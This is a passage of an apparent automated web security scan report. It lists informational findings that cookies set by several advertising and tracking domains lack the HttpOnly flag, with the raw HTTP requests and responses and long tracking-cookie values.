pf=wUs3RJjrnHBGmoPKC2w1BSzahta4gd-h8vP4oQlAWBgStJHO4dSC7tcSjJ5dCIRN8otVVKbFPjeNTxIiX5ySOUqurdpBdA7aDRpJC66X22yIHFm0S0kHxvLP_MYOfXLQq-dHAl-abYU1X5bYp5n9CSBwbmS48Uljm8MNWJG0d45yqi9mVjA02NuqavQ6eQd_y_Nxu2TdlUTz31ahRlm2jPXSJEnzjwmCJ-ww7TyzMnW_D1Ycf85DI0aXnqcS-yYhrNze5mJSmFU_16iWg6qGXaslDVv0CEp6k0oxMtW5frkHxEQfWMRgFYDLU3__ZDn7GKhK_pbP_UBUvvBV4z0YcGVGnrhJgXnNyT8YxkkLqook3V-8aWQ5ogo6xIv_g-tlU41tEj6SOLoKbZtcPAoWvIZNSZlGi5_0oLVgGgqWSLjIumXKNgQi-6kDQjunCLT7fjwUoJhpAG-BIBpu1eL5-lDKNc4L8lxhmJCi0XSQieFhFwq7SaNdz_ocTatUAU-qEFDSOVOmzcXCrTh-KvrBNQnMcpeUOVFqdnEJkJDKTqW5CyjQ9CWSKcOGeQNIGZUPNsclUfoCKs_P08jgwSgJYbcIxoWpLP8kJHirQfhJM1m92s9xXr05DIv8cqx6xYqZz2pyniL4I0AFr11avteCTHP-MKrmQGILwqOPUURxPh_OaB7pgTaF4qWQ2HhJHM7MQ1FATrIPe9fO1W-kVj41FzAInC6SN2fmozOFzLuTgF9cmu2fgg-ptDZq0nhZGPUq7ENa4utBAijkMB8acerWmKUiG3NKxRUIkdkWSlkGWLmKvSfxSVUhBehZqqkXgkvNStUBXiPiubepGWTwbovBGpJUJQLVBqLanOblkHJu9xH3GDUUM_ZOcJx6Ga7Je7zMcY_QS925sh7URWgzYJaPWjRgkXleqqVT1LQZLlwfgGNcyBeVzRUxv3Q7asCZPWvJx5xGZTqtRs2xUNiSflAsSHFST6QiOZR468XMdu_IjTAaJdutfTchePMF9BJE48SVs2eS74sZWCAm9rPc1kIbbk-pKbU4KtSl-ktr55_QkH3ovtrh5jGpi8fiId0xkxWG1vbbopJLM8C9at-8yKvEqAR567tiTDPDC5AioBKZ_aEJX4PLxtPJDTh6LcF4_fx6l369zx79lO56qpsZFi6-Icne4cLOSJ3coSRqSfAxlRzGjU4Tn7VESa-w2mjoF9vwj15O7a79JjYY5qVgXc2osU2kYjIqQf2_6LnQaqKT-Pb0XaBOKdel8lyMk_dn1RYgFGIEDJrpUW62qucYCD2LJczkpLARLMKPKWRScvsz04-jesN4QzQjQFlP0J6VZDJFHmaXa4eb8PMHp0xhQcCR4bqZL9BkxhlgtnxOXWCzQELeIBJUJspLAB50oC31fGkON-rRU7eE4QzN3Cj6YpqHXvt8xLb-TJA3MW3gWM8oadZrihclDcMg24IQ1mssSMoGnSi5oFPpM3C1T95FgaV2FhfNZ-wWSAoC-ekqRlbYKilgrqOhS_hzDUPsZfBJd2FhVACj21yYaTIGE8VBZkwZ0hQ6Ladu7PughH-bIm4y0Ab6nRgUKcGXElGE-_DS4Ricu2NP8QQUwEddIGGXiI0ikX8tIMOHu7ZzFVt755dCSQZs-k9i-tjPDbhaQ0YI__sTf8igRaY5cyCnjyOwVD2OS009W1ujEvgdnOfJu5crBfoqKPISxg4JMc-wfusvOiL66IfoxhRVau6TltYBb7-XChmyRJwYT3SVN8WLd39hZk8Bc5k_8SzK7X_3Bu_DkXEJ1-0bPVbCw9gJGr_B8xDvqoSRWiJ0aXKJcZ-Rm_1IemcOgPxlg_I4GVGQsts3-Widpm2owGjEbtSLL0XOjeWJwuRIJkkBAqJsNNITsh4NZ79vNPuYVunznl4Ru-AlUbhO4WJot6ZQLYMWYK-3VIhf9NOVCTi9EKN0EChMCpt8t79taa2O8z0zAFVDyg3ety8a8X24jJ6sSBHRnGvcfC46N5cRIRjWMuveNQmJnehLSzrzO4mWkXY8sRfEZSRVF-eLcIql8-Bktoud7UrXynkSAhN6akQLaY-eXSAvrbezbiKSwrMJsaQSeTsKGuCQQr2-y5a7Qi8VwRgyzaNjUJGKJsi6dxv2oUpLC8kr0lnKkHXcJR_rGcvm6DgXUkti2dAj3C6gNLghcL1ATT4dfXoT0XCq9YPC5oENmg6G4qCLpkd6bOL8K_8x_ofi-YZIXtSwkZ2h2FTEOB7VAVaX5hOrFfnL1gLyqIqik_zuH70qAJA-PBhbA79851KT4-AG0SCN_FhhxOiLtoiA3m7onhzh-TJc88tEfwDGbxnH_j1h-NtVFTKdRNhtT0fDJE-__QeonnnzZXsc9K80-WU_VLBsdQNA2PYXH3Rff0knxJcVZ7Chz4FJJ_TMv03yL7XPeYtr4s0GKf3t057ZF4_jL2ifoo0t0noToysMQ98IGemf7gcP8sUOs_epJQ8gyIjVMYX2SuE1jSJBqGoTNfCkFA_1FMJLxHxDTLD68RZNW115CcBbPNgZZKRiXKaLKD62rQnfDWK35o0A7w8jrj3wOje0h3VO65HFl2Qkz1aQHw1bkZ4UQ7kl9hQMcyi_uXiusieb9oqny7NzWYCf6XmrNS7dZQ8PQj4xieKYCskpNEszFxoPPk2bpwxxJLKaR6-s3EU26XW92a-msXAhMgRGpU1p6Juquy9ZrCLMz-gm43o_H-Bl7sbzW9GEZ0ngzf92snAnRcT637PYoh9vs8nxEshXyZrKeJEXnSgmaEwKGT0NYjHqeyWBScug8JR8Ogml2rS_8VpwQL7zeGBwWLOtt2X6e5mIpzfBfsaJojQQA8aQFUV499JD3JawQFF-O5bgAetRXnIhw7Q1GQOqAwPZYBAlsXj29aoCtsMnTKiqJ-4FPyvAt7MYGai56hsHZYw1pPFfubGkytCfTIRLVtkmYuONkgCSYgnFnvF5gKPmXiBQ9dWg5UVe5zOlev8xSqT-8JS2EDyiLHISVTcA2XV0Papii_0G4vyX4BB1uK3mZKqFwCB7V_2_YMp2tLu2luQQzSKrFobpGzDPG60qE7Z1BueqeWLTn54P86vtZCdL4Et0GphOd6rTMoWpTj1U1wX22aW3FPU1oQkWEyK98ozmItdcuoDcloFWpq5ZHCojxL_cWf4EwTRa2OYv6xN_c1_3djCz_W53uzQhFTz7d2IZbRiKFFqlaE1XAnxcOp4xiYuYfIzeYiTtzrVIHv7wUzHKILRxITElIfz1Os_Qq07M4F9O_CBoBBTZPqpiN6lRHoduZTv7rwXS_mtQPlV9OlcM3SofjeVvDb839deLUAObQ8GB-e8PtB-b2vXw1XxBOXggLkQ33Mxxv0oPw2IFtoFLcC4UWvoXMOCBLu4d31iv78LZ7orMqeG9dIdYhrW8gVTGc8vc44PtS2IyZUysSPh_4uJu; uid=4325897289836481830; rrs=1%7C6%7C3%7C12%7C1002%7C18%7C7%7C1%7C9%7C7%7C10%7C13%7C1003%7C1006%7C2%7C12%7C1001%7C1004%7C1008; rds=15146%7C15146%7C15149%7C15146%7C15146%7C15146%7C15149%7C15146%7C15149%7C15146%7C15146%7C15146%7C15146%7C15145%7C15146%7C15149%7C15146%7C15146%7C15149; rv=1

Response

8.20. http://delivery.steelhousemedia.com/serve previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://delivery.steelhousemedia.com
Path:	/serve

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ccc="OTA2OjI=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 22-Jun-2012 13:44:59 GMT;Max-Age=31536000
view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Sun, 20-Jun-2021 13:44:59 GMT;Max-Age=315360000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ=="

Response

8.21. http://future.grapeshot.co.uk/tech/channels.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://future.grapeshot.co.uk
Path:	/tech/channels.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=1207876142; Path=/; Domain=.grapeshot.co.uk; Max-Age=31536000; Version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tech/channels.cgi?url=http%3A//www.techradar.com/news/computing/internet/uk-most-paranoid-about-computer-security-suggests-study-969910 HTTP/1.1
Host: future.grapeshot.co.uk
Proxy-Connection: keep-alive
Referer: http://www.techradar.com/news/computing/internet/uk-most-paranoid-about-computer-security-suggests-study-969910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=1207876142

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 13:44:31 GMT
Server: Apache/2.2.3 (CentOS)
GSError: empty
GSID: xl6t4ax
GSUID: 1207876142
Set-Cookie: uid=1207876142; Path=/; Domain=.grapeshot.co.uk; Max-Age=31536000; Version=1
Cache-Control: max-age=3600
Expires: Thu, 23 Jun 2011 14:44:31 GMT
Connection: close
Content-Type: text/javascript
Content-Length: 150

// Grapeshot channels-empty.js template
// Set gs_channels variable for insertion into an advert call
// contextual categories
gs_channels = "NONE";

8.22. http://i.w55c.net/ping_match.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/ping_match.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wfivefivec=ea5c094a-3a81-4d54-b8e2-975f65fd39a9;Path=/;Domain=.w55c.net;Expires=Sat, 22-Jun-13 13:44:53 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?rurl=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D535039%26ev%3D_wfivefivec_ HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=ea5c094a-3a81-4d54-b8e2-975f65fd39a9

Response

HTTP/1.1 302 Found
Date: Thu, 23 Jun 2011 13:44:53 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=ea5c094a-3a81-4d54-b8e2-975f65fd39a9;Path=/;Domain=.w55c.net;Expires=Sat, 22-Jun-13 13:44:53 GMT
X-Version: DataXu Pixel Tracker v3
Cache-Control: private
Content-Length: 0
Location: http://bh.contextweb.com/bh/rtset?do=add&pid=535039&ev=ea5c094a-3a81-4d54-b8e2-975f65fd39a9
Via: 1.1 rhv192175010000 (MII-APC/1.6)
Content-Type: text/plain

8.23. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

udm_0=MLvvNzMNZjhn3tNDUOn9Rw8CYJMzyjPPqEpc6O1HdA/zzwOIp+sMJM4VFVYB3OpUU0Eex6sURtMmxQwz6+tPZPApyOqS7g99GMSlNrlAMps04cSedAn0IHXaA6HiLUb7qM4X8AOUEawZhuwWzp6c0KbcO2TUC5j9Vhfie38FUKM8aPJdRgSI8gH4DgLkhRAW1voZVLV22LWHD9x/LShkRAFDrVPJ6+nAR7qS2QAMkg+4V6hmeFK470y5/JreGq1OsV7CmpKIKeQX0bSU/sz+CBDDbXgJKhUFq0XV88GGTWey45AOSM5gGf/VqI1WQntr0wWO/v1K5LbeIw4wmQPr6j42qIH51QjKTPKQP6YS0oGeHR9Nxa2oQiLcrS22kph/+KKvHbRMFKtHjw5eMujbD9tXhWgCGl10krsYyKQN6sn5aBkMs/oENeO0I5AkdqCk4US+kRmDl449iPXMzxpZJvVuZQDT9tMHRt9vWVtNi2Q/tStqPDiho1pOU70sNzyrtDPMlI/drhVLnJEZaVQPGTYGx6kucKJySP5FU+SitbJPyVTemroXui3iD8kNAOsweLrT2Eh3p08TbSrpAI6Z8HIna/jCWCZG0Sp7Kl1Y74SO7Dh2T3m54BdqXEsPYwS6S9m3aWIK7fnONxYsBrCSfQN2Y/h5GAhbAReubQq4SMH47piiZ8kZ5LPKtMR2yW2wqx2hTjeLghk782jfxS5UrWh4OLjdOuHdbTpckQtOdMOOrkb5BVOJnhNwZxmuvUBKsIp0peqVZ9iGb/aGfOMdGu4Qkcu/bZlCp7uRcwgKnOnbYBaBkLE7LZg+WO87vrtSKJPAO5wDoTy7iJUSdTdaKDuZ6v5sLNcvn1QlDZ/6oImvljd2T7BeVlJXZM6vJx8mWsoBt59CH/Fw8xuPDuiyi8nFSERZO6xMToJD46zqmoSGNsZkTqb2KE717ePaHqAfO+HtJ/7ESMU0kV159tivauG9q9ojiwbFmgTsYnCFLNz/OYnIXX4NkvmXBkP653UAPTCDtiH+FFfy9uC4xdNOfTXDwzUMzig99guz8s+jgtMuCZpEVWNU4qE4phlHHqJsQZacTdsz5EXFvlSiA+HN3yCDoXUpWowvKCmLmYh3H4iY+Ad+lG0irVW50iYphrVJ78FMwpO1ctZfuOhAVf38gLcYAdmdCQZO6+HVhoW5/YIYrdMIAu5H0EjC+fG3UFMYo7HmokVwE//3QYTJ1nj+oYhQEhBk9hBS7qjzktjOh1z3twgI/Fs2/lL9q4rgbKfO+HlYYEt8JUNARGj5iC2poGY+jlw+Q7uHMLeNRYoLR/z68dzL1wqM4L++E3oQE95rzHCL6VgxMC1Wo9S7vjrx3pf9uV+lWVJRED8M95ESou7uETnWfT1iu9fLZ2KBiKt6eyheQvVDWWcZvNIxBBfnCN1mEGFEzZR+2DOAQE7L08ytW0rWVMgb3JMkJ7HvAh0w90/LNix9KbSSR1sAPSSIqpVb1YETC128nQNgOUXKrP1VYdYc9znE6q2qpqp3gbBtpx2do0ASA6mnBlNFShdDkVlPpKtekr9afgmaeCEsCCSUZFsDYNLj8HVL/kJSu3h9fsdlY5yMLOEoJ+KgifbUZhAhe/LqoUkdFHosX6botHcT27YxhTbq9uF5oVjnG7Y112pFY6MtQUvC7SXhtC/wAwvHdX3DhiG7Pxw/Y0sDcyKpZuI7TRZsRNGtqcRlVlAaQ/RIdgIlWHEFJcajqhexFsZpjRpkFzNbtZ9xlJARDg==; Domain=.revsci.net; Expires=Fri, 22-Jun-2012 11:11:58 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=G07610&bpid=S0244 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.viti.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_x5er="MLsXtSMNbzpvJREZ68UcOOELrMtuPiIcCFkCnclTxJH8vk8TdcY5465J7VBINn40uY1VQWw6JvjAI9t21D7Bk/o4BGnARfz2D8J9JpKmmLrJwmjhu+F9kS5HBlosiV+MwZlRpo0Yic5I7OwUqEFmbnJVDaLqlSgeJ/pHvCqc3sVLFzxLw8MQ3dmk9yVVFYnzxsr8iYJBk0DOpTWbdg1qj0zZ+WHbRhhUG0jd4yT/ZdRgSBa7Qcioo01+P881F/DtQVXIoeBjo+fSGHr7Hm616pD1S+rp4T6szpEDuIB6JXtt3LM4OZ2D4Ql2AgapEhjc61SHhQSqzoz+B6MuA4pEs7oTuNMKNnTMBK8HFPC2w0ylwb2IbnSo7BtekfnjeG0WGR0n5bdkrjkHh1ha4pHuQ+Qm71mjHzjR9jUJy4pBtjIMmQOisxaeRr7i3Q51KDjYLHsfF17k/h3RRZ2Kz0Es2MOg5dP7NgAN8Gbd72FnAkRVB9sURu09fIxVicKPPWVp393mx/72fqMKlbhej8hLfVnPWSdc8IkAuNByGNJ4mCK6EsGZkx9ymq6Qaki9vuOA4Y0BJtuwxywO2wh3kzFPXu0ekEsFNf+EyX0U2cDoJGvuLGhxzpwV8I2842FUPTRxfcQTYvGOo6N2FFg3ATETybTP4PlZH0jFFk7n3mfFRcit74J7eiwCBqLUXbmAgFq8wYWDzHO0b9se8K34r3+arxK6o7qlvZJhy3nCbI7xIFSDqTRfgPLlmsxCW7rYYU92wmM9mIWT2aj001qjH0OFz8R/sqNySK1l2PnfcBFCB80n2V82LxLOw6/mJe6JcUxFOmrOsylOxOCwJmB6Ts607wrnVVIcTt2go27IlWFiEBVBy+i0HKKLmTJ1vV5MTY33oZ5PG074Wp+iiW5rlRWPlmHONXB9mtG8hC9sLk1qHArZ6/D6pzphfYKHXKApg+Cj4Wuyg42siPA826mPNz6os5bQx1z7tKKDuLy+l3C4eknnzcatEuEQRQ+9zdFFyfYmCVlF8VD2rzkBDrHfT7srmoLMmMYwTtDyt7dohSAfrb/B7shmxeIhC7Xdm62f5YOCi7VnQ25U96jf6V5u7ADZwigBDvvvtDCgBpD1qrpk5pp4l152gjxk4EQYYr9wK4KSK+RT6QdLqpLmEZit5Qwmufxfw02Q48TSIdQh8bEBLwbz5yeNAP3lYHA3/yI9iOq7R0oFD8y4sxZT4qIFLUplwQGJni2pRVG3ZpqBgCqmWoApZw2LkxfS9ozRkR5lKkLCp+8CLuIB6eTs791Nx11Avipvs5BgJHxC96nQQOxCCjvABvhdxvIML0oZ25qey4qO5JlLmXLv3H69/srXaHpuF0I1yC8xzyfGwzdFShq6QGPGCHpf8JIrSvVXukYt8ee58Gc30EvqlxSK3HE9/BmDzgFiJBr6iPHhVfzHL2sV9j6BQQYc+Yn6SUBKiCMGIjDrFGxoTHwByfc2v/aSMT45dNX64BwOyL89dYdND8vOzxYS/8AaxCCDscccYcQ9L4kWtDHZ4zM7NQFnbPkAVzIU5TPUo2EJ8Rhi/bSKU7znZqNZruBBE7WnlneSmXPTIH+qfpA="; rsi_us_1000000="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"; udm_0=MLv3NzUNZjhr3tNDUOn9R09Q/iVINsi+A+62LxZQIiiDoaro9jANDYuXCoMWXJpEr578X/X/rStRjsP29zg0eOpl2kN6IAh9mCZ6f40jwpXbbR+M1nJLx0XUrtRq+BAu8ru7oLa+85zbDpVa3xBcWiHxY9A7dq3vlkyv1tnZ/vyxy4fwHWFmR9Iz9qnb6JniT6m5GU/0iA+/u2lQ+sDDQ0DsfbD/1HdpBDpIesxPX8JYnddhi+eqbbvUkZrOLLaCtlYFuo7Ob5E82tMkVARU/PCkJ3dsJIt8ZbjoWqnTI2ek6Dd2MG8ifA/Av5y3VFP3yDjr6k7wjucgDT2WFOo2bfd7pvxilQQmbcV16QUZsLybZw6Qpj8GeQH2POWhO3g7raALq7hM5BQYqhsnKxe2cjW38bmUP0itRNNt4b4aEEv2m9TqUjm5yKtenGu3q/Pb46uAHZrrJx22VDMbjyt/6FpyJYhs1wNQ40ZYZEKAgyKvINMvL+zkd2kE67GkzfB3GNOPg+7Xxq0e3sBqr5fUKuU7f6EupmnTnb8CWrd05apeZ3eWkTixOusVjXSCXkT+/BwVGALQuoZn8FMskA4dYPbfDk5OItDsA7zUDxdjRRXrk2GmX945Da+s1UjZW3U+2xaoJTGLybF07NRPZ1eegSpQDH8u1Si7Y1n+jo7hC29xnK1nt1mMwbul5U1fBU3fsCNiopFyZScl1+BuGFMen8igEiOgzObkp+pdBeVAmrlUtFsnjfjlRhi6K7c0FG/LrKLuG3Kyak18TSY5lYta7kIh4QTHXu0sX+6B0KW7XWoIGo0tcEKmgCVzyNegLa3WK1gjpmROjIsqnfoXpavGi5e+6+WUuqx+UeWUK0e6r/rZ6nCql5SwkI9Jyhf9gPJeAftVgqPS2efn2RBBB8mVKj7/Zzr+ev5n1AX2t+6PuG+NLGg4zUFYLg1dfJDT34/dRV9RX2d8W4Qhz6a0BUfjecgsb9KuZ4RrkG+qRnW7ddvIt2FVfZEmF+lzvhwH6WJIVZP/2d0cyPdC7MwIIbMTXAcLqo+ST1Y6nDncz0vVkuZ+UvNtcVrJUKd8b4